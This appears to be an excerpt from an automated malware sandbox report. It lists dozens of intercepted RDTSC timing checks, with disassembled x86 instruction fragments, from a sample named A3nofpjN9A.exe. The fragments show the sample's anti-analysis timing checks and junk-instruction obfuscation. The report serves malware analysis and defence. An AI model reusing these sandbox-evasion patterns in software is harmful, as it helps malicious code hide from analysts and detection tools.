Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C74870 second address: C74888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F5FC0CE52C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F5FC0CE52C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C74888 second address: C7488C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7488C second address: C74895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C76A05 second address: C76A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C79894 second address: C7989F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7ABCE second address: C7ABD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7DBA9 second address: C7DBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0CE52CCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7DBBB second address: C7DBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007F5FC0E77A18h 0x0000000d jnc 00007F5FC0E77A08h 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7FD6D second address: C7FD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F5FC0CE52C6h 0x0000000c popad 0x0000000d popad 0x0000000e js 00007F5FC0CE52DAh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7FD85 second address: C7FD89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7FD89 second address: C7FD8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C875C7 second address: C87603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jc 00007F5FC0E77A06h 0x0000000f jmp 00007F5FC0E77A10h 0x00000014 jc 00007F5FC0E77A06h 0x0000001a popad 0x0000001b pushad 0x0000001c jmp 00007F5FC0E77A13h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C87603 second address: C8760B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C8760B second address: C87610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C87610 second address: C87615 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C878BF second address: C878C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5FC0E77A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C87A14 second address: C87A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5FC0CE52D2h 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F5FC0CE52C6h 0x00000013 pop ebx 0x00000014 popad 0x00000015 jc 00007F5FC0CE52D6h 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C87A42 second address: C87A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C8D166 second address: C8D16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C8D16A second address: C8D195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edi 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 jmp 00007F5FC0E77A18h 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C8D195 second address: C8D1B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F5FC0CE52C6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push ecx 0x00000011 push eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C8D1B4 second address: C8D1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C8D1B9 second address: C8D1CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C915E7 second address: C915EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C915EB second address: C915FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F5FC0CE52EFh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91884 second address: C91889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91889 second address: C918A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5FC0CE52D1h 0x00000008 jg 00007F5FC0CE52C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C918A5 second address: C918B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C918B2 second address: C918BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C918BA second address: C918BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91A1D second address: C91A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91A21 second address: C91A29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91A29 second address: C91A34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007F5FC0CE52C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91A34 second address: C91A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91BBD second address: C91BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5FC0CE52C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91BCB second address: C91BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0E77A13h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91BE2 second address: C91BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91BE6 second address: C91BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 js 00007F5FC0E77A1Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91BF9 second address: C91BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91BFD second address: C91C01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C69424 second address: C44833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5FC0CE52CEh 0x0000000f pop edx 0x00000010 nop 0x00000011 jmp 00007F5FC0CE52D9h 0x00000016 lea eax, dword ptr [ebp+1248B18Eh] 0x0000001c jg 00007F5FC0CE52C8h 0x00000022 mov edi, dword ptr [ebp+122D283Eh] 0x00000028 push eax 0x00000029 push edi 0x0000002a jmp 00007F5FC0CE52D2h 0x0000002f pop edi 0x00000030 mov dword ptr [esp], eax 0x00000033 mov cl, FDh 0x00000035 call dword ptr [ebp+122D1857h] 0x0000003b jno 00007F5FC0CE52E8h 0x00000041 jo 00007F5FC0CE52DCh 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C69550 second address: C69555 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C69555 second address: C695FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a pushad 0x0000000b jmp 00007F5FC0CE52CEh 0x00000010 push edx 0x00000011 mov edi, ecx 0x00000013 pop edx 0x00000014 popad 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov dh, ACh 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 xor edi, dword ptr [ebp+1244CB16h] 0x0000002b mov edi, ebx 0x0000002d mov dword ptr [ebp+1248B1E6h], esp 0x00000033 movzx edi, dx 0x00000036 cmp dword ptr [ebp+122D29CEh], 00000000h 0x0000003d jne 00007F5FC0CE5398h 0x00000043 jmp 00007F5FC0CE52CCh 0x00000048 push edi 0x00000049 sbb cx, C690h 0x0000004e pop ecx 0x0000004f mov byte ptr [ebp+122D1865h], 00000047h 0x00000056 mov di, C0C9h 0x0000005a mov eax, D49AA7D2h 0x0000005f push 00000000h 0x00000061 push esi 0x00000062 call 00007F5FC0CE52C8h 0x00000067 pop esi 0x00000068 mov dword ptr [esp+04h], esi 0x0000006c add dword ptr [esp+04h], 00000019h 0x00000074 inc esi 0x00000075 push esi 0x00000076 ret 0x00000077 pop esi 0x00000078 ret 0x00000079 ja 00007F5FC0CE52CCh 0x0000007f push eax 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 jo 00007F5FC0CE52C6h 0x0000008a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C695FC second address: C69613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C69F09 second address: C69F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C69F0F second address: C69F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jne 00007F5FC0E77A10h 0x0000000d je 00007F5FC0E77A0Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6A785 second address: C6A81F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop esi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e and edi, 0A6E3E66h 0x00000014 lea eax, dword ptr [ebp+1248B1D2h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F5FC0CE52C8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 push eax 0x00000035 je 00007F5FC0CE52D4h 0x0000003b jmp 00007F5FC0CE52CEh 0x00000040 mov dword ptr [esp], eax 0x00000043 mov dword ptr [ebp+122D3572h], edx 0x00000049 call 00007F5FC0CE52D3h 0x0000004e add dword ptr [ebp+122D22C7h], ebx 0x00000054 pop ecx 0x00000055 lea eax, dword ptr [ebp+1248B18Eh] 0x0000005b mov edx, edi 0x0000005d nop 0x0000005e pushad 0x0000005f jng 00007F5FC0CE52CCh 0x00000065 jnl 00007F5FC0CE52C6h 0x0000006b push edi 0x0000006c pushad 0x0000006d popad 0x0000006e pop edi 0x0000006f popad 0x00000070 push eax 0x00000071 pushad 0x00000072 jo 00007F5FC0CE52CCh 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6A81F second address: C6A828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C96DBA second address: C96DBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C96EE5 second address: C96EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C96EEB second address: C96EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C96EF4 second address: C96EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C973E0 second address: C973FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D9h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C973FE second address: C97447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5FC0E77A06h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F5FC0E77A0Ah 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 jo 00007F5FC0E77A16h 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F5FC0E77A0Eh 0x00000024 jmp 00007F5FC0E77A13h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C97447 second address: C9744D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C9744D second address: C97451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: C97451 second address: C97455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: C97715 second address: C9771B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: C9771B second address: C97741 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5FC0CE52CAh 0x0000000d jmp 00007F5FC0CE52D4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA0258 second address: CA0260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA0260 second address: CA0265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: C9ED78 second address: C9ED91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: C9FC75 second address: C9FC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5FC0CE52D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: C9FC94 second address: C9FC9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: C9FC9A second address: C9FCA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F5FC0CE52C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA440D second address: CA4417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA4417 second address: CA4426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jne 00007F5FC0CE52C6h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA45B6 second address: CA45BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA46C7 second address: CA46D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA46D3 second address: CA46F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F5FC0E77A0Eh 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e js 00007F5FC0E77A06h 0x00000014 jnp 00007F5FC0E77A06h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA46F7 second address: CA4703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA4952 second address: CA4958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA4958 second address: CA4982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007F5FC0CE52CAh 0x0000000b jmp 00007F5FC0CE52D9h 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA4C83 second address: CA4CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0E77A16h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA4CA4 second address: CA4CAC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA4E19 second address: CA4E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007F5FC0E77A0Bh 0x0000000f pop ebx 0x00000010 jbe 00007F5FC0E77A0Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA4E37 second address: CA4E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA4E3F second address: CA4E6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jns 00007F5FC0E77A0Ah 0x00000011 push eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA4E6D second address: CA4E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA4FFD second address: CA5003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA5003 second address: CA5012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 ja 00007F5FC0CE52C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA5173 second address: CA517D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5FC0E77A0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CA3FE6 second address: CA3FED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
